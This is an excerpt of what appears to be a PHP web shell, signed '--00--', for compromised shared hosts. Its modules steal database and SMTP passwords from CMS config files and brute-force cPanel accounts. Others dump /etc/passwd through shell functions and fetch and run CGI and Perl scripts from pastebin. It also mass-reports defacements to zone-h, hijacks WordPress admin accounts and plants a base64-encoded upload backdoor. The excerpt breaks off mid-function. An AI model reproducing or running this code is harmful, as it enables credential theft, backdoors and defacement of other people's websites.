  1520. }
  1521.    
  1522. }
  1523.  elseif($_GET['do'] == 'cpanel') {
  1524.     if($_POST['crack']) {
  1525.         $usercp = explode("\r\n", $_POST['user_cp']);
  1526.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1527.         $i = 0;
  1528.         foreach($usercp as $ucp) {
  1529.             foreach($passcp as $pcp) {
  1530.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1531.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1532.                     } else {
  1533.                         $_SESSION[$ucp] = "1";
  1534.                         $_SESSION[$pcp] = "1";
  1535.                         $i++;
  1536.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1537.                     }
  1538.                 }
  1539.             }
  1540.         }
  1541.         if($i == 0) {
  1542.         } else {
  1543.             echo "<br>Nemu ".$i." Cpanel by <font color=lime>--00--</font>";
  1544.         }
  1545.     } else {
  1546.         echo "<center>
  1547.         <form method='post'>
  1548.         USER: <br>
  1549.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1550.         $_usercp = fopen("/etc/passwd","r");
  1551.         while($getu = fgets($_usercp)) {
  1552.             if($getu == '' || !$_usercp) {
  1553.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1554.             } else {
  1555.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1556.                 foreach($u[1] as $user_cp) {
  1557.                         if(is_dir("/home/$user_cp/public_html")) {
  1558.                             echo "$user_cp\n";
  1559.                     }
  1560.                 }
  1561.             }
  1562.         }
  1563.         echo "</textarea><br>
  1564.         PASS: <br>
  1565.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1566.         function cp_pass($dir) {
  1567.             $pass = "";
  1568.             $dira = scandir($dir);
  1569.             foreach($dira as $dirb) {
  1570.                 if(!is_file("$dir/$dirb")) continue;
  1571.                 $ambil = file_get_contents("$dir/$dirb");
  1572.                 if(preg_match("/WordPress/", $ambil)) {
  1573.                     $pass .= ambilWord($ambil,"DB_PASSWORD', '","'")."\n";
  1574.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1575.                     $pass .= ambilWord($ambil,"password = '","'")."\n";
  1576.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1577.                     $pass .= ambilWord($ambil,"<password><![CDATA[","]]></password>")."\n";
  1578.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1579.                     $pass .= ambilWord($ambil,'password = "','"')."\n";
  1580.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1581.                     $pass .= ambilWord($ambil,"'DB_PASSWORD', '","'")."\n";
  1582.                 } elseif(preg_match("/client/", $ambil)) {
  1583.                     preg_match("/password=(.*)/", $ambil, $pass1);
  1584.                     if(preg_match('/"/', $pass1[1])) {
  1585.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1586.                         $pass .= $pass1[1]."\n";
  1587.                     }
  1588.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1589.                     $pass .= ambilWord($ambil,"db_password = '","'")."\n";
  1590.                 }
  1591.             }
  1592.             echo $pass;
  1593.         }
  1594.         $cp_pass = cp_pass($dir);
  1595.         echo $cp_pass;
  1596.         echo "</textarea><br>
  1597.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1598.         </form>
  1599.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1600.     }
  1601. } elseif($_GET['do'] == 'smtp') {
  1602.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1603.     function scj($dir) {
  1604.         $dira = scandir($dir);
  1605.         foreach($dira as $dirb) {
  1606.             if(!is_file("$dir/$dirb")) continue;
  1607.             $ambil = file_get_contents("$dir/$dirb");
  1608.             $ambil = str_replace("$", "", $ambil);
  1609.             if(preg_match("/JConfig|joomla/", $ambil)) {
  1610.                 $smtp_host = ambilWord($ambil,"smtphost = '","'");
  1611.                 $smtp_auth = ambilWord($ambil,"smtpauth = '","'");
  1612.                 $smtp_user = ambilWord($ambil,"smtpuser = '","'");
  1613.                 $smtp_pass = ambilWord($ambil,"smtppass = '","'");
  1614.                 $smtp_port = ambilWord($ambil,"smtpport = '","'");
  1615.                 $smtp_secure = ambilWord($ambil,"smtpsecure = '","'");
  1616.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1617.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1618.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1619.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1620.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1621.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1622.             }
  1623.         }
  1624.     }
  1625.     $smpt_hunter = scj($dir);
  1626.     echo $smpt_hunter;
  1627. } elseif($_GET['do'] == 'auto_wp') {
  1628.     if($_POST['hajar']) {
  1629.         $title = htmlspecialchars($_POST['new_title']);
  1630.         $pn_title = str_replace(" ", "-", $title);
  1631.         if($_POST['cek_edit'] == "Y") {
  1632.             $script = $_POST['edit_content'];
  1633.         } else {
  1634.             $script = $title;
  1635.         }
  1636.         $conf = $_POST['config_dir'];
  1637.         $scan_conf = scandir($conf);
  1638.         foreach($scan_conf as $file_conf) {
  1639.             if(!is_file("$conf/$file_conf")) continue;
  1640.             $config = file_get_contents("$conf/$file_conf");
  1641.             if(preg_match("/WordPress/", $config)) {
  1642.                 $dbhost = ambilWord($config,"DB_HOST', '","'");
  1643.                 $dbuser = ambilWord($config,"DB_USER', '","'");
  1644.                 $dbpass = ambilWord($config,"DB_PASSWORD', '","'");
  1645.                 $dbname = ambilWord($config,"DB_NAME', '","'");
  1646.                 $dbprefix = ambilWord($config,"table_prefix  = '","'");
  1647.                 $prefix = $dbprefix."posts";
  1648.                 $option = $dbprefix."options";
  1649.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1650.                 $db = mysql_select_db($dbname);
  1651.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1652.                 $result = mysql_fetch_array($q);
  1653.                 $id = $result[ID];
  1654.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1655.                 $result2 = mysql_fetch_array($q2);
  1656.                 $target = $result2[option_value];
  1657.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1658.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1659.                 echo "<div style='margin: 5px auto;'>";
  1660.                 if($target == '') {
  1661.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1662.                 } else {
  1663.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1664.                 }
  1665.                 if(!$update OR !$conn OR !$db) {
  1666.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1667.                 } else {
  1668.                     echo "<font color=lime>sukses di ganti.</font><br>";
  1669.                 }
  1670.                 echo "</div>";
  1671.                 mysql_close($conn);
  1672.             }
  1673.         }
  1674.     } else {
  1675.         echo "<center>
  1676.         <h1>Auto Edit Title+Content WordPress</h1>
  1677.         <form method='post'>
  1678.         DIR Config: <br>
  1679.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1680.         Set Title: <br>
  1681.         <input type='text' name='new_title' value='Hacked By --00--' placeholder='New Title'><br><br>
  1682.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1683.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1684.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1685.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1686.         </form>
  1687.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1688.         ";
  1689.     }
  1690. } elseif($_GET['do'] == 'zoneh') {
  1691.     if($_POST['submit']) {
  1692.         $domain = explode("\r\n", $_POST['url']);
  1693.         $nick =  $_POST['nick'];
  1694.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1695.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1696.         function zoneh($url,$nick) {
  1697.             $ch = curl_init("http://www.zone-h.com/notify/single");
  1698.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1699.                   curl_setopt($ch, CURLOPT_POST, true);
  1700.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1701.             return curl_exec($ch);
  1702.                   curl_close($ch);
  1703.         }
  1704.         foreach($domain as $url) {
  1705.             $zoneh = zoneh($url,$nick);
  1706.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1707.                 echo "$url -> <font color=lime>OK</font><br>";
  1708.             } else {
  1709.                 echo "$url -> <font color=red>ERROR</font><br>";
  1710.             }
  1711.         }
  1712.     } else {
  1713.         echo "<center><form method='post'>
  1714.         <u>Defacer</u>: <br>
  1715.         <input type='text' name='nick' size='50' value='--00--'><br>
  1716.         <u>Domains</u>: <br>
  1717.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1718.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1719.         </form>";
  1720.     }
  1721.     echo "</center>";
  1722. }elseif($_GET['do'] == 'lcf') {
  1723.     mkdir('LCF',0755);
  1724. chdir('LCF');
  1725. $kokdosya = ".htaccess";
  1726. $dosya_adi = "$kokdosya";
  1727. $dosya = fopen ($dosya_adi , 'w') or die ("Error mas broo!!!");
  1728. $metin = "OPTIONS Indexes Includes ExecCGI FollowSymLinks   \n AddType application/x-httpd-cgi .pl \n AddHandler cgi-script .pl \n AddHandler cgi-script .pl
  1729. \n \n Options \n DirectoryIndex seees.html \n RemoveHandler .php \n AddType application/octet-stream .php";
  1730. fwrite ( $dosya , $metin ) ;
  1731.  fclose ($dosya);
  1732. $file = fopen("lcf.pl","w+");
  1733. $write = fwrite ($file ,file_get_contents("http://pastebin.com/raw/26jAL0sz"));
  1734. fclose($file);
  1735. chmod("lcf.pl",0755);
  1736. echo "<iframe src=LCF/lcf.pl width=97% height=100% frameborder=0></iframe>";
  1737. }
  1738.  elseif($_GET['do'] == 'cgi') {
  1739.     $cgi_dir = mkdir('idx_cgi', 0755);
  1740.     $file_cgi = "idx_cgi/cgi.izo";
  1741.     $isi_htcgi = "AddHandler cgi-script .izo";
  1742.     $htcgi = fopen(".htaccess", "w");
  1743.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1744.     $cgi = fopen($file_cgi, "w");
  1745.     fwrite($cgi, $cgi_script);
  1746.     fwrite($htcgi, $isi_htcgi);
  1747.     chmod($file_cgi, 0755);
  1748.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1749. } elseif($_GET['do'] == 'fake_root') {
  1750.     ob_start();
  1751.     function reverse($url) {
  1752.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  1753.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1754.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  1755.               curl_setopt($ch, CURLOPT_HEADER, 0);
  1756.               curl_setopt($ch, CURLOPT_POST, 1);
  1757.         $resp = curl_exec($ch);
  1758.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  1759.         $array = explode(",,", $resp);
  1760.         unset($array[0]);
  1761.         foreach($array as $lnk) {
  1762.             $lnk = "http://$lnk";
  1763.             $lnk = str_replace(",", "", $lnk);
  1764.             echo $lnk."\n";
  1765.             ob_flush();
  1766.             flush();
  1767.         }
  1768.               curl_close($ch);
  1769.     }
  1770.     function cek($url) {
  1771.         $ch = curl_init($url);
  1772.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1773.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1774.         $resp = curl_exec($ch);
  1775.         return $resp;
  1776.     }
  1777.     $cwd = getcwd();
  1778.     $ambil_user = explode("/", $cwd);
  1779.     $user = $ambil_user[2];
  1780.     if($_POST['reverse']) {
  1781.         $site = explode("\r\n", $_POST['url']);
  1782.         $file = $_POST['file'];
  1783.         foreach($site as $url) {
  1784.             $cek = cek("$url/~$user/$file");
  1785.             if(preg_match("/hacked/i", $cek)) {
  1786.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1787.             }
  1788.         }
  1789.     } else {
  1790.         echo "<center><form method='post'>
  1791.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1792.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1793.         Domain: <br>
  1794.         <textarea style='width: 450px; height: 250px;' name='url'>";
  1795.         reverse($_SERVER['HTTP_HOST']);
  1796.         echo "</textarea><br>
  1797.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1798.         </form><br>
  1799.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1800.     }
  1801. } elseif($_GET['do'] == 'adminer') {
  1802.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1803.     function adminer($url, $isi) {
  1804.         $fp = fopen($isi, "w");
  1805.         $ch = curl_init();
  1806.               curl_setopt($ch, CURLOPT_URL, $url);
  1807.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1808.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1809.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1810.               curl_setopt($ch, CURLOPT_FILE, $fp);
  1811.         return curl_exec($ch);
  1812.               curl_close($ch);
  1813.         fclose($fp);
  1814.         ob_flush();
  1815.         flush();
  1816.     }
  1817.     if(file_exists('adminer.php')) {
  1818.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1819.     } else {
  1820.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1821.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1822.         } else {
  1823.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  1824.         }
  1825.     }
  1826. }elseif($_GET['do'] == 'passwbypass') {
  1827.     echo '<center>Bypass etc/passw With:<br>
  1828. <table style="width:50%">
  1829.  <tr>
  1830.    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  1831.    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  1832.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  1833.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  1834.    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  1835. </tr></table>Bypass User With : <table style="width:50%">
  1836. <tr>
  1837.    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  1838.    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  1839.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  1840.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  1841.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  1842. </tr>
  1843. </table><br>';
  1844.  
  1845.  
  1846. if ($_POST['awkuser']) {
  1847. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1848. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  1849. echo "</textarea><br>";
  1850. }
  1851. if ($_POST['systuser']) {
  1852. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1853. echo system("ls /var/mail");
  1854. echo "</textarea><br>";
  1855. }
  1856. if ($_POST['passthuser']) {
  1857. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1858. echo passthru("ls /var/mail");
  1859. echo "</textarea><br>";
  1860. }
  1861. if ($_POST['exuser']) {
  1862. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1863. echo exec("ls /var/mail");
  1864. echo "</textarea><br>";
  1865. }
  1866. if ($_POST['shexuser']) {
  1867. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1868. echo shell_exec("ls /var/mail");
  1869. echo "</textarea><br>";
  1870. }
  1871. if($_POST['syst'])
  1872. {
  1873. echo"<textarea class='inputz' cols='65' rows='15'>";
  1874. echo system("cat /etc/passwd");
  1875. echo"</textarea><br><br><b></b><br>";
  1876. }
  1877. if($_POST['passth'])
  1878. {
  1879. echo"<textarea class='inputz' cols='65' rows='15'>";
  1880. echo passthru("cat /etc/passwd");
  1881. echo"</textarea><br><br><b></b><br>";
  1882. }
  1883. if($_POST['ex'])
  1884. {
  1885. echo"<textarea class='inputz' cols='65' rows='15'>";
  1886. echo exec("cat /etc/passwd");
  1887. echo"</textarea><br><br><b></b><br>";
  1888. }
  1889. if($_POST['shex'])
  1890. {
  1891. echo"<textarea class='inputz' cols='65' rows='15'>";
  1892. echo shell_exec("cat /etc/passwd");
  1893. echo"</textarea><br><br><b></b><br>";
  1894. }
  1895. echo '<center>';
  1896. if($_POST['melex'])
  1897. {
  1898. echo"<textarea class='inputz' cols='65' rows='15'>";
  1899. for($uid=0;$uid<60000;$uid++){
  1900. $ara = posix_getpwuid($uid);
  1901. if (!empty($ara)) {
  1902. while (list ($key, $val) = each($ara)){
  1903. print "$val:";
  1904. }
  1905. print "\n";
  1906. }
  1907. }
  1908. echo"</textarea><br><br>";
  1909. }
  1910. //
  1911.  
  1912. //
  1913. } elseif($_GET['do'] == 'auto_dwp') {
  1914.     if($_POST['auto_deface_wp']) {
  1915.         function anucurl($sites) {
  1916.             $ch = curl_init($sites);
  1917.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1918.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1919.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1920.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1921.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1922.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1923.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1924.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1925.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1926.             $data = curl_exec($ch);
  1927.                   curl_close($ch);
  1928.             return $data;
  1929.         }
  1930.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1931.             $post = array(
  1932.                    "log" => "$userr",
  1933.                    "pwd" => "$pass",
  1934.                    "rememberme" => "forever",
  1935.                    "wp-submit" => "$wp_submit",
  1936.                    "redirect_to" => "$web",
  1937.                    "testcookie" => "1",
  1938.                    );
  1939.             $ch = curl_init($cek);
  1940.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1941.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1942.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1943.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1944.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1945.                   curl_setopt($ch, CURLOPT_POST, 1);
  1946.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1947.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1948.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1949.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1950.             $data = curl_exec($ch);
  1951.                   curl_close($ch);
  1952.             return $data;
  1953.         }
  1954.         $scan = $_POST['link_config'];
  1955.         $link_config = scandir($scan);
  1956.         $script = htmlspecialchars($_POST['script']);
  1957.         $user = "--00--";
  1958.         $pass = "--00--";
  1959.         $passx = md5($pass);
  1960.         foreach($link_config as $dir_config) {
  1961.             if(!is_file("$scan/$dir_config")) continue;
  1962.             $config = file_get_contents("$scan/$dir_config");
  1963.             if(preg_match("/WordPress/", $config)) {
  1964.                 $dbhost = ambilWord($config,"DB_HOST', '","'");
  1965.                 $dbuser = ambilWord($config,"DB_USER', '","'");
  1966.                 $dbpass = ambilWord($config,"DB_PASSWORD', '","'");
  1967.                 $dbname = ambilWord($config,"DB_NAME', '","'");
  1968.                 $dbprefix = ambilWord($config,"table_prefix  = '","'");
  1969.                 $prefix = $dbprefix."users";
  1970.                 $option = $dbprefix."options";
  1971.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1972.                 $db = mysql_select_db($dbname);
  1973.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1974.                 $result = mysql_fetch_array($q);
  1975.                 $id = $result[ID];
  1976.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1977.                 $result2 = mysql_fetch_array($q2);
  1978.                 $target = $result2[option_value];
  1979.                 if($target == '') {                
  1980.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1981.                 } else {
  1982.                     echo "[+] $target <br>";
  1983.                 }
  1984.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1985.                 if(!$conn OR !$db OR !$update) {
  1986.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1987.                     mysql_close($conn);
  1988.                 } else {
  1989.                     $site = "$target/wp-login.php";
  1990.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  1991.                     $b1 = anucurl($site2);
  1992.                     $wp_sub = ambilWord($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1993.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1994.                     $anu2 = ambilWord($b,"name=\"_wpnonce\" value=\"","\" />");
  1995.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1996.                     $www = "m.php";
  1997.                     $fp5 = fopen($www,"w");
  1998.                     fputs($fp5,$upload3);
  1999.                     $post2 = array(
  2000.                             "_wpnonce" => "$anu2",
  2001.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2002.                             "themezip" => "@$www",
  2003.                             "install-theme-submit" => "Install Now",
  2004.                             );
  2005.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2006.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2007.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2008.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2009.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2010.                           curl_setopt($ch, CURLOPT_POST, 1);
  2011.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2012.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2013.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2014.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2015.                     $data3 = curl_exec($ch);
  2016.                           curl_close($ch);
  2017.                     $y = date("Y");
  2018.                     $m = date("m");
  2019.                     $namafile = "id.php";
  2020.                     $fpi = fopen($namafile,"w");
  2021.                     fputs($fpi,$script);
  2022.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2023.                            curl_setopt($ch6, CURLOPT_POST, true);
  2024.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2025.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2026.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2027.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2028.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2029.                     $postResult = curl_exec($ch6);
  2030.                            curl_close($ch6);
  2031.                     $as = "$target/k.php";
  2032.                     $bs = anucurl($as);
  2033.                     if(preg_match("#$script#is", $bs)) {
  2034.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  2035.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2036.                         } else {
  2037.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  2038.                         echo "[!!] coba aja manual: <br>";
  2039.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2040.                         echo "[+] username: <font color=lime>$user</font><br>";
  2041.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  2042.                         }
  2043.                     mysql_close($conn);
  2044.                 }
  2045.             }
  2046.         }
  2047.     } else {
  2048.         echo "<center><h1>WordPress Auto Deface</h1>
  2049.         <form method='post'>
  2050.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2051.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By --00--' required><br>
  2052.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2053.         </form>
  2054.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2055.         </center>";
  2056.     }
  2057. } elseif($_GET['do'] == 'auto_dwp2') {
  2058.     if($_POST['auto_deface_wp']) {
  2059.         function anucurl($sites) {
  2060.             $ch = curl_init($sites);
  2061.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2062.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2063.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2064.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2065.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2066.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2067.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2068.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2069.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2070.             $data = curl_exec($ch);
  2071.                   curl_close($ch);
  2072.             return $data;
  2073.         }
  2074.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2075.             $post = array(
  2076.                    "log" => "$userr",
  2077.                    "pwd" => "$pass",
  2078.                    "rememberme" => "forever",
  2079.                    "wp-submit" => "$wp_submit",
  2080.                    "redirect_to" => "$web",
  2081.                    "testcookie" => "1",
  2082.                    );
  2083.             $ch = curl_init($cek);
  2084.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2085.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2086.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2087.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2088.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2089.                   curl_setopt($ch, CURLOPT_POST, 1);
  2090.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2091.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2092.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2093.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2094.             $data = curl_exec($ch);
  2095.                   curl_close($ch);
  2096.             return $data;
  2097.         }
  2098.         $link = explode("\r\n", $_POST['link']);
  2099.         $script = htmlspecialchars($_POST['script']);
  2100.         $user = "indoxploit";
  2101.         $pass = "indoxploit";
  2102.         $passx = md5($pass);
  2103.         foreach($link as $dir_config) {
  2104.             $config = anucurl($dir_config);
  2105.             $dbhost = ambilWord($config,"DB_HOST', '","'");
  2106.             $dbuser = ambilWord($config,"DB_USER', '","'");
